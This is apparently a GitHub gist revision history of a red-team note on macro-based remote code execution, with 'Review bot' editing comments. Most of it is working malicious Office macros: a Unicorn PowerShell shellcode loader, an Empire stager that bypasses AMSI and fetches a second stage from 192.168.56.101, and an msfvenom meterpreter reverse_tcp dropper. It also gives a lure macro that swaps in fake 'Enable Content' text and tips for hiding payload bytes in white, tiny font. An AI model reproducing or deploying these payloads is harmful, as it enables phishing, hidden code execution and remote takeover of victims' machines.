    & "PAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHI" _
    & "AdAAoACQAcwApADsA"
    Call Shell(rkEsZ, vbHide)
    End Sub
    Sub AutoOpen()
    pm6HSAm
    End Sub
    Sub Workbook_Open()
    pm6HSAm
    End Sub
    ```

    ---


    **5. `Empire` generated `windows/macro` stager**

    The **PowerShell Empire** can also provide MS Office Macro as a stager for our listener.

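Review bot: "a payload consiting of `powershell.exe` invocation" should read "a payload consisting of a `powershell.exe` invocation". It would also help to document what the generated `rkEsZ` string is: `powershell.exe -nop -w hidden -e <blob>`, where `-e` (`-EncodedCommand`) takes the Base64 of a UTF-16LE script, which accounts for the regular `A` characters throughout the blob; readers comparing this with the `Unicorn` payload named in the intro need that to see the similarity, and the `-nop -w hidden -e` triple is exactly the command-line pattern that detection rules for this family key on.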
  11. @mgeeky mgeeky revised this gist Aug 21, 2017. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion Various-Macro-Based-RCEs.md
    @@ -362,7 +362,7 @@ As the macro's comment suggest, the long blob of bytes at the end of this script
    ---


    **4. `Empire` generated `windows/macro` stager **
    **4. `Empire` generated `windows/macro` stager**

    The **PowerShell Empire** can also provide MS Office Macro as a stager for our listener.

  12. @mgeeky mgeeky revised this gist Aug 21, 2017. 1 changed file with 98 additions and 0 deletions.
    98 changes: 98 additions & 0 deletions Various-Macro-Based-RCEs.md
    @@ -10,6 +10,7 @@ List:
    1. The [Unicorn](https://github.com/trustedsec/unicorn) **Powershell** based payload
    2. `regsvr32` based method
    3. Metasploit generated payload `vba-exe`
    4. `Empire` generated `windows/macro` stager


    ---
    @@ -360,3 +361,100 @@ As the macro's comment suggest, the long blob of bytes at the end of this script

    ---


    **4. `Empire` generated `windows/macro` stager **

    The **PowerShell Empire** can also provide MS Office Macro as a stager for our listener.

    In order to acquire such stager we can follow the following steps (for Empire 2.0):

    - `uselistener http`
    - `set Host 192.168.56.101`
    - `main`
    - `usestager windows/macro`
    - `set Listener http`
    - `execute`

    The resulting Macro will be of form:

    ```
    Sub AutoOpen()
    Debugging
    End Sub
    Sub Document_Open()
    Debugging
    End Sub
    Public Function Debugging() As Variant
    Dim Str As String
    str = "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ"
    str = str + "BzAHMARQBtAEIAbABZAC4ARwBFAFQAVABZAFAARQAoACcAUwB5"
    str = str + "AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AH"
    str = str + "QAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcA"
    str = str + "KQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAGkARQ"
    str = str + "BMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAn"
    str = str + "ACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjAC"
    str = str + "cAKQAuAFMARQBUAFYAYQBsAFUAZQAoACQATgB1AGwAbAAsACQA"
    str = str + "VABSAHUARQApAH0AOwBbAFMAWQBTAFQARQBNAC4ATgBFAHQALg"
    str = str + "BTAEUAcgB2AGkAQwBlAFAAbwBpAE4AVABNAEEAbgBBAGcARQBS"
    str = str + "AF0AOgA6AEUAWABQAEUAQwB0ADEAMAAwAEMATwBuAFQAaQBOAF"
    str = str + "UAZQA9ADAAOwAkAFcAYwA9AE4AZQB3AC0ATwBCAGoARQBDAHQA"
    str = str + "IABTAFkAUwB0AGUAbQAuAE4AZQBUAC4AVwBFAGIAQwBMAEkAZQ"
    str = str + "BOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAg"
    str = str + "ACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE"
    str = str + "8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAA"
    str = str + "cgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbw"
    str = str + "AnADsAJABXAGMALgBIAEUAYQBkAGUAUgBzAC4AQQBkAGQAKAAn"
    str = str + "AFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAE"
    str = str + "MALgBQAHIATwB4AFkAPQBbAFMAWQBTAHQARQBNAC4ATgBFAHQA"
    str = str + "LgBXAGUAYgBSAEUAUQB1AGUAUwB0AF0AOgA6AEQARQBmAEEAVQ"
    str = str + "BsAFQAVwBFAGIAUABSAG8AWAB5ADsAJAB3AGMALgBQAFIATwB4"
    str = str + "AHkALgBDAHIARQBEAEUAbgB0AGkAYQBMAFMAIAA9ACAAWwBTAH"
    str = str + "kAcwBUAGUATQAuAE4AZQBUAC4AQwByAGUARABlAG4AdABpAGEA"
    str = str + "bABDAGEAYwBIAEUAXQA6ADoARABFAGYAYQB1AEwAdABOAEUAVA"
    str = str + "BXAG8AcgBrAEMAUgBlAEQARQBuAHQASQBBAEwAcwA7ACQASwA9"
    str = str + "AFsAUwBZAFMAdABFAE0ALgBUAEUAeABUAC4ARQBOAEMAbwBEAG"
    str = str + "kAbgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AEUA"
    str = str + "cwAoACcAdwBKADEAcwBaAD8AKgA1AFcAOgBuAFYAaQBlADsANg"
    str = str + "A4AHkAfABVACwAfgBGACUAMgBYAEgAMABBACkASQB7ACcAKQA7"
    str = str + "ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBzADsAJABTAD"
    str = str + "0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoA"
    str = str + "PQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJA"
    str = str + "BLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABf"
    str = str + "AF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAF"
    str = str + "sAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEA"
    str = str + "KQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQ"
    str = str + "ApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABd"
    str = str + "AD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAE"
    str = str + "IAWABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQA"
    str = str + "SABdACkAJQAyADUANgBdAH0AfQA7ACQAVwBDAC4ASABlAGEAZA"
    str = str + "BlAFIAcwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBz"
    str = str + "AGUAcwBzAGkAbwBuAD0AYgBTAG8ASgBUAHMAOAA2AEsANQBvAF"
    str = str + "kAcwBLAEUATwBmAC8ASwAxADUAYwArADkASQBvAGMAPQAiACkA"
    str = str + "OwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQ"
    str = str + "A2ADgALgA1ADYALgAxADAAMQA6ADgAMAAnADsAJAB0AD0AJwAv"
    str = str + "AGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnAD"
    str = str + "sAJABkAEEAdABhAD0AJABXAEMALgBEAG8AdwBuAEwAbwBhAGQA"
    str = str + "RABhAHQAQQAoACQAcwBFAFIAKwAkAFQAKQA7ACQASQBWAD0AJA"
    str = str + "BEAGEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAVABhAD0AJABE"
    str = str + "AEEAdABBAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwBUAE"
    str = str + "gAXQA7AC0AagBPAGkAbgBbAEMAaABBAFIAWwBdAF0AKAAmACAA"
    str = str + "JABSACAAJABEAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfA"
    str = str + "BJAEUAWAA="
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create str, Null, objConfig, intProcessID
    End Function
    ```

    Obviously we can enhance it any further as we wish, as well as obfuscate it little bit further.


    ---

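Review bot: the text says only "Obviously we can enhance it any further" and never explains the tail of `Debugging()`: instead of `Shell`, the stager is launched through WMI (`GetObject("winmgmts:...Win32_Process")` followed by `objProcess.Create str, Null, objConfig, intProcessID`, with `Win32_ProcessStartup.ShowWindow` set to `HIDDEN_WINDOW = 0`). A sentence documenting that choice belongs here, because the process is then created by the WMI provider host rather than as a direct child of the Office application, which is the detail anyone using this listing to understand process-ancestry telemetry around Office needs. Minor: `Dim Str As String` followed by `str = ...` works only because VBA identifiers are case-insensitive; pick one spelling.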
  13. @mgeeky mgeeky revised this gist Aug 21, 2017. 1 changed file with 112 additions and 1 deletion.
    113 changes: 112 additions & 1 deletion Various-Macro-Based-RCEs.md
    @@ -4,6 +4,14 @@ Nothing new or fancy here, just a list of techniques, tools and scripts collecte

    _All of the below examples had been generated for using as a remote address: **192.168.56.101**._

    List:

    0. Page substiution macro for luring user to click _Enable Content_
    1. The [Unicorn](https://github.com/trustedsec/unicorn) **Powershell** based payload
    2. `regsvr32` based method
    3. Metasploit generated payload `vba-exe`


    ---

    **0. Page substiution macro for luring user to click _Enable Content_**
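Review bot: "substiution" in the new list item 0 and in the heading `**0. Page substiution macro for luring user to click _Enable Content_**` should be "substitution"; the heading also reads better as "for luring the user".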
    @@ -248,4 +256,107 @@ So the entire attack goes as follows:
    ---


    **3. **
    **3. Metasploit generated payload `vba-exe`**

    In this method, we leverage the Metasploit's `msfvenom` utility to generate a `vba-exe` payload that consists of two parts:

    - A macro that shall be pasted in `Auto_Open` function
    - An exe file encoded in form of "&H" hex chars long blob.

    We can generate this macro as follows:

    ```
    work|16:42|~ # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f vba-exe
    ```

    Then we will get the following output:
    ```
    '**************************************************************
    '*
    '* This code is now split into two pieces:
    '* 1. The Macro. This must be copied into the Office document
    '* macro editor. This macro will run on startup.
    '*
    '* 2. The Data. The hex dump at the end of this output must be
    '* appended to the end of the document contents.
    '*
    '**************************************************************
    '*
    '* MACRO CODE
    '*
    '**************************************************************
    Sub Auto_Open()
    Ctjwp12
    End Sub
    Sub Ctjwp12()
    Dim Ctjwp7 As Integer
    Dim Ctjwp1 As String
    Dim Ctjwp2 As String
    Dim Ctjwp3 As Integer
    Dim Ctjwp4 As Paragraph
    Dim Ctjwp8 As Integer
    Dim Ctjwp9 As Boolean
    Dim Ctjwp5 As Integer
    Dim Ctjwp11 As String
    Dim Ctjwp6 As Byte
    Dim Vvdicidvtv as String
    Vvdicidvtv = "Vvdicidvtv"
    Ctjwp1 = "EVVVfVKLSHcv.exe"
    Ctjwp2 = Environ("USERPROFILE")
    ChDrive (Ctjwp2)
    ChDir (Ctjwp2)
    Ctjwp3 = FreeFile()
    Open Ctjwp1 For Binary As Ctjwp3
    For Each Ctjwp4 in ActiveDocument.Paragraphs
    DoEvents
    Ctjwp11 = Ctjwp4.Range.Text
    If (Ctjwp9 = True) Then
    Ctjwp8 = 1
    While (Ctjwp8 < Len(Ctjwp11))
    Ctjwp6 = Mid(Ctjwp11,Ctjwp8,4)
    Put #Ctjwp3, , Ctjwp6
    Ctjwp8 = Ctjwp8 + 4
    Wend
    ElseIf (InStr(1,Ctjwp11,Vvdicidvtv) > 0 And Len(Ctjwp11) > 0) Then
    Ctjwp9 = True
    End If
    Next
    Close #Ctjwp3
    Ctjwp13(Ctjwp1)
    End Sub
    Sub Ctjwp13(Ctjwp10 As String)
    Dim Ctjwp7 As Integer
    Dim Ctjwp2 As String
    Ctjwp2 = Environ("USERPROFILE")
    ChDrive (Ctjwp2)
    ChDir (Ctjwp2)
    Ctjwp7 = Shell(Ctjwp10, vbHide)
    End Sub
    Sub AutoOpen()
    Auto_Open
    End Sub
    Sub Workbook_Open()
    Auto_Open
    End Sub
    '**************************************************************
    '*
    '* PAYLOAD DATA
    '*
    '**************************************************************
    Vvdicidvtv
    &H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H8F&HC9&H1C&H93&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
    [...]
    &H0D&H55&H20&H4D&H57
    ```

    As the macro's comment suggest, the long blob of bytes at the end of this script have to be simply pasted to the document's contents (one of Active document's Paragraphs). In order to avoid suspitions one can set a white colored font of smallest possible size to avoid lurking at the blob.

    ---

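Review bot: spelling and grammar in the added prose: "suspitions" should be "suspicions", and "As the macro's comment suggest, the long blob of bytes at the end of this script have to be simply pasted" should read "suggests ... has to be". The bullet "A macro that shall be pasted in `Auto_Open` function" is also misleading, since the generated code defines `Auto_Open` (plus `AutoOpen` and `Workbook_Open`) itself; "a macro whose `Auto_Open` entry point runs when the document opens" would describe the listing.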
  14. @mgeeky mgeeky revised this gist Aug 21, 2017. 1 changed file with 14 additions and 1 deletion.
    15 changes: 14 additions & 1 deletion Various-Macro-Based-RCEs.md
    @@ -95,6 +95,9 @@ The use case scenario goes as follows:
    - The user clicks the _"Enable Content"_ and the above macro gets executed firstly, making a page switch by deleting the fake warning message and pasting everything what has been stored in this very document in **AutoText** called `RealDoc`.


    ---



    **1. The [Unicorn](https://github.com/trustedsec/unicorn) **Powershell** based payload**

    @@ -169,6 +172,9 @@ End Sub
    ```


    ---


    **2. `regsvr32` based method**

    This method works by making built-in Microsoft tool named `regsvr32` that is used for registering and unregistering OLE Controls / ActiveX objects even from remote resources in a form of **scriptlet** files (`.sct`). By leveraging that feature we can supply remotely hosted (on the attacker-controlled web server) malicious _scriptlet_ file that would after being loaded execute arbitrary commands on the victim's machine.
    @@ -234,5 +240,12 @@ End Sub

    So the entire attack goes as follows:

    Malicious document with `Run("regsvr32 [...] /i:http://[...]/file.sct")` -> `file.sct` delivers Powershell Download & Exec command (`backdoor`) -> `backdoor` Powershell CMD reverse tcp 2nd stage gets delivered and executed
    - Malicious document with `Run("regsvr32 [...] /i:http://[...]/file.sct")`
    - `file.sct` delivers Powershell Download & Exec command (`backdoor`)
    - `backdoor` Powershell CMD reverse tcp 2nd stage gets delivered and executed


    ---


    **3. **
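Review bot: `**3. **` commits an empty numbered heading with no title and no body, so the revision ends on a placeholder; either fill in the section or leave the heading out until it has content. Minor: the new bullet list that replaces the arrow sentence reads well, but the three bullets end without punctuation while the surrounding lists on the page end their items with a period, so pick one convention.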
  15. @mgeeky mgeeky created this gist Aug 21, 2017.
    238 changes: 238 additions & 0 deletions Various-Macro-Based-RCEs.md
    @@ -0,0 +1,238 @@
    This is a note for myself describing various Visual Basic macros construction techniques that could be used for remote code execution via malicious Document vector.
    Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.


    _All of the below examples had been generated for using as a remote address: **192.168.56.101**._

    ---

    **0. Page substiution macro for luring user to click _Enable Content_**

    One can use the [following macro](https://gist.github.com/mgeeky/3c705560c5041ab20c62f41e917616e6) for implementing a document-contents switch after luring user to click "Enable Content":

    ```
    Public alreadyLaunched As Integer
    Private Sub Malware()
    '
    ' ============================================
    '
    ' Enter here your malware code here.
    ' It will be started on auto open surely.
    '
    ' ============================================
    MsgBox ("Here comes the malware!")
    ' ============================================
    End Sub
    Private Sub Launch()
    If alreadyLaunched = True Then
    Exit Sub
    End If
    Malware
    SubstitutePage
    alreadyLaunched = True
    End Sub
    Private Sub SubstitutePage()
    '
    ' This routine will take the entire Document's contents,
    ' delete them and insert in their place contents defined in
    ' INSERT -> Quick Parts -> AutoText -> named as in `autoTextTemplateName`
    '
    Dim doc As Word.Document
    Dim firstPageRange As Range
    Dim rng As Range
    Dim autoTextTemplateName As String
    ' This is the name of the defined AutoText prepared in the document,
    ' to be inserted in place of previous contents.
    autoTextTemplateName = "RealDoc"
    Set firstPageRange = Word.ActiveDocument.Range
    firstPageRange.Select
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    Set doc = ActiveDocument
    Set rng = doc.Sections(1).Range
    doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True
    doc.Save
    End Sub
    Sub AutoOpen()
    ' Becomes launched as first on MS Word
    Launch
    End Sub
    Sub Document_Open()
    ' Becomes launched as second, another try, on MS Word
    Launch
    End Sub
    Sub Auto_Open()
    ' Becomes launched as first on MS Excel
    Launch
    End Sub
    Sub Workbook_Open()
    ' Becomes launched as second, another try, on MS Excel
    Launch
    End Sub
    ```

    The use case scenario goes as follows:

    - We want the victim to click _"Enable Content"_ to get our macro code executed
    - To do so, we prepare a fake "Need to Enable Content" message like compatibility issues, AV triggered flag or alike
    - Then we place **entire real document contents** in an **AutoText** named `RealDoc` (Office ribbon -> INSERT -> Quick Parts -> AutoTexts -> name it: `RealDoc`)
    - The user clicks the _"Enable Content"_ and the above macro gets executed firstly, making a page switch by deleting the fake warning message and pasting everything what has been stored in this very document in **AutoText** called `RealDoc`.



    **1. The [Unicorn](https://github.com/trustedsec/unicorn) **Powershell** based payload**

    This payload uses downgraded **Powershell.exe** command-line invocation that will download 2nd stage from the remote server and execute it on the owned machine.
    The downside of this method is the fact that the `Unicorn` script generates only **Powershell.exe** related payload and also adds a MsgBox with english message stating that the Excel/Word application needs to be closed. Only then the payload gets launched properly.

    **Example script:**

    ```
    Private Sub Document_Open()
    Test
    End Sub
    Private Sub DocumentOpen()
    Test
    End Sub
    Private Sub Auto_Open()
    Test
    End Sub
    Private Sub AutoOpen()
    Test
    End Sub
    Private Sub Auto_Exec()
    Test
    End Sub
    Sub Test()
    Dim HsQgOKMOa
    HsQgOKMOa = "-w 1 -C ""sv xW -;sv PrZ ec;sv dyS ((gv xW).value.toString()+(gv PrZ).value.toString());" & "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & " (gv dyS).value.toString() ('JABDAEgAeAAgAD0AIAAnACQAdQB4AHIAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgA" _
    & "gAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGw'+'AbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABU" _
    & "AGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AG'+'kAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsA" _
    & "CIAKQBdA'+'HAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAdQB4AHIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBu'+'AGEAbQBlAHMAcABhAGMAZQAgAFcAaQB" _
    & "uADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGMANQAsADAAeABiAGQALAAwAHgAMQBhACwAMAB4ADYAMAAsADAAeABkAGIALAAwAHgAMgA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAzACwAMAB4AGMAOQA'+'sADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA2AGUALAAwAHgAMQA4ACwAMAB4" _
    & "ADAAMwAsADAAeAA2AGUALAAwAHgAMQA4ACwAMAB4ADgAMwAsADAAeABjADYALAAwAHgAMQBlACwAMAB4ADgAMgAsADAAeAAyAGUALAAwAHgAZABiACwAMAB4AGYANgAsADAAeABjADAALAAwAHgAZAAxACwAMAB4ADIANAAsADAAeAAwADYALAAwAHgAYQA1ACwAMAB4ADUAOAAsADAAeABjADEALAAwAHgAMwA3ACwAMAB4AGUANQAsADAAeAAzAGYALA'+'AwAHgAOAAxACwAMAB4ADYANwAsADAAeABkADUALAAwAHgAMwA0ACwAMAB4AGMANwAsADAAeAA4AGIALAAwAHgAOQBlACwAMAB4ADEAOQAsADAAeABmA" _
    & "GMALAAwAHgAMQA4ACwAMAB4AGQAMgAsADAAeABiADUALAAwAHgAZgAzACwAMAB4AGEAOQAsADAAeAA1ADkALAAwAHgAZQAwACwAMAB4ADMAYQAsADAAeAAyAGEALAAwAHgAZgAxACwAMAB4AGQAMAAsADAAeAA1AGQALAAwAHgAYQA4ACwAMAB4ADAAOAAsADAAeAAwADUALAAwAHgAYgBlACwAM'+'AB4ADkAMQAsADAAeABjADIALAAwAHgANQA4ACwAMAB4AGIAZgAsADAAeABkADYALAAwAHgAMwBmACwAMAB4ADkAMAAsADAAeABlAGQALAAwAHgAOABmACwAMAB4ADMANAAsADAAeAAwADcALAAwAHgAMAAyAC" _
    & "wAMAB4AGEANAAsADAAeAAwADEALAAwAHgAOQA0ACwAMAB4AGEAOQAsADAAeABmADYALAAwAHgAOAA0ACwAMAB4ADkAYwAsADAAeAA0AGUALAAwAHgANABlACwAMAB4AGEANgAsADAAeAA4AGQALAAwAHgAYwAwACwAMAB4AGMANQAsADAA'+'eABmADEALAAwAHgAMABkACwAMAB4AGUAMgAsADAAeAAwAGEALAAwAHgAOABhACwAMAB4ADAANwAsADAAeABmAGMALAAwAHgANABmACwAMAB4AGIANwAsADAAeABkAGUALAAwAHgANwA3ACwAMAB4AGIAYgAsADAAeAA0ADMALAAwAHgAZQAxACwAMAB4ADUAMQAsADA" _
    & "AeABmADIALAAwAHgAYQBjACwAMAB4ADQAZQAsADAAeAA5AGMALAAwAHgAMwBiACwAMAB4ADUAZgAsADAAeAA4AGUALAAwAHgAZAA4ACwAMAB4AGYAYgAsADAAeAA4ADAALAAwAHg'+'AZQA1ACwAMAB4ADEAMAAsADAAeABmADgALAAwAHgAMwBkACwAMAB4AGYAZQAsADAAeABlADYALAAwAHgAOAAzACwAMAB4ADkAOQAsADAAeAA4AGIALAAwAHgAZgBjACwAMAB4ADIAMwAsADAAeAA2ADkALAAwAHgAMgBiACwAMAB4AGQAOQAsADAAeABkADIALAAwAHgAYgBlACwAMAB4AGEAYQAsADAAeABhAGEALAAwAHgA" _
    & "ZAA4ACwAMAB4ADAAYgAsADAAeABiADgALAAwAHgAZgA1ACwAMAB4AGYAYwAsADAAeAA4AGEALAAwAHgANgBkACwAMAB4AD'+'gAZQAsADAAeABmADgALAAwAHgAMAA3ACwAMAB4ADkAMAAsADAAeAA0ADEALAAwAHgAOAA5ACwAMAB4ADUAYwAsADAAeABiADcALAAwAHgANAA1ACwAMAB4AGQAMgAsADAAeAAwADcALAAwAHgAZAA2ACwAMAB4AGQAYwAsADAAeABiAGUALAAwAHgAZQA2ACwAMAB4AGUANwAsADAAeAAzAGYALAAwAHgANgAxACwAMAB4ADUANgAsADAAeAA0ADIALAAwAHgANABiACwAMAB4ADgAZ" _
    & "gAsADAAeAA4ADMALAAwAHgAZgBmACwAMAB4ADEANgAsADAAeABjA'+'DcALAAwAHgANgAwACwAMAB4ADMAMgAsADAAeABhADkALAAwAHgAMQA3ACwAMAB4AGUAZgAsADAAeAA0ADUALAAwAHgAZABhACwAMAB4ADIANQAsADAAeABiADAALAAwAHgAZgBkACwAMAB4ADcANAAsADAAeAAwADUALAAwAHgAMwA5ACwAMAB4AGQAOAAsADAAeAA4ADMALAAwAHgANgBhACwAMAB4ADEAMAAsADAAeAA5AGMALAAwAHgAMQBjACwAMAB4ADkANQAsADAAeAA5AGIALAAwAHgAZABkACwAMAB4ADMANQAsADAAeAA1ADEALA" _
    & "AwAHgAYwBm'+'ACwAMAB4ADgAZAAsADAAeAAyAGQALAAwAHgANwAwACwAMAB4ADcAMAAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4ADcAZAAsADAAeABhADUALAAwAHgAZgAzACwAMAB4AGEAYgAsADAAeABlADkALAAwAHgAOAA2ACwAMAB4AGEAYwAsADAAeAA4AGMALAAwAHgAOABjACwAMAB4ADYAZQAsADAAeABhAGYALAAwAHgAZQBjACwAMAB4ADQAZgAsADAAeABkADQALAAwAHgAMgA2ACwAMAB4ADAAYQAsADAAeAAxAGYALAAwAHgANwBhACwAMAB4ADYAOQA'+'sADAAeAA4ADMALAAwAHgAZABmACwA" _
    & "MAB4ADIAYQAsADAAeABjADkALAAwAHgANwAzACwAMAB4AGIANwAsADAAeAAyADAALAAwAHgAYwA2ACwAMAB4AGEAYwAsADAAeABhADcALAAwAHgANABhACwAMAB4ADAAYwAsADAAeABjADUALAAwAHgANABkACwAMAB4AGEANQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4AGYAOQAsADAAeAA1AGMALAAwAHgAYQAwACwAMAB4ADMANgAsADAAeAA5ADgALAAwAHgAYQAxACwAMAB4ADcAZQAsADAAeAAzADMALA'+'AwAHgAOQBhACwAMAB4ADIAYQAsADAAeAA4AGQALAAwAHgAYwAzACwAMAB4ADUANAAsADAAe" _
    & "ABkAGIALAAwAHgAZgA4ACwAMAB4AGQANwAsADAAeAAwADAALAAwAHgAMgBiACwAMAB4AGIANwAsADAAeAA4AGEALAAwAHgAOAA2ACwAMAB4ADMANAAsADAAeAA2AGQALAAwAHgAYQAwACwAMAB4ADIANgAsADAAeABhADEALAAwAHgAOABhACwAMAB4ADYAMwAsADAAeAA3ADEALAAwAHgANQBkACwAMAB4ADkAMQAsADAAeAA1ADIALAAwAHgAYgA1ACwAM'+'AB4AGMAMgAsADAAeAA2AGEALAAwAHgAYgAxACwAMAB4AGMAZQAsADAAeABjAGIALAAwAHgAZgBlACwAMAB4ADcAYQAsADAAeABiADgALAAwAHgAMw" _
